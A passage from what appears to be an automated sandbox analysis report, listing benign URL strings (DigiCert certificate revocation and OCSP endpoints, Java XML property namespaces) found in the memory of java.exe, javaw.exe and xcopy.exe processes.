xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
        Source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
        Source: java.exe, 00000002.00000002.1638031502.000000000A40A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
        Source: java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000554C000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/dtd/properties.dtd
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/(
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
        Source: java.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkrce
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
        Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSourceX
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespacex
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
        Source: javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/3
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
        Source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://musicbrainz.org
        Source: javaw.exe, 00000006.00000002.2853953769.0000000015570000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A104000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000544E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852184942.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723167720.0000000015C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
        Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009F78000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A579000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
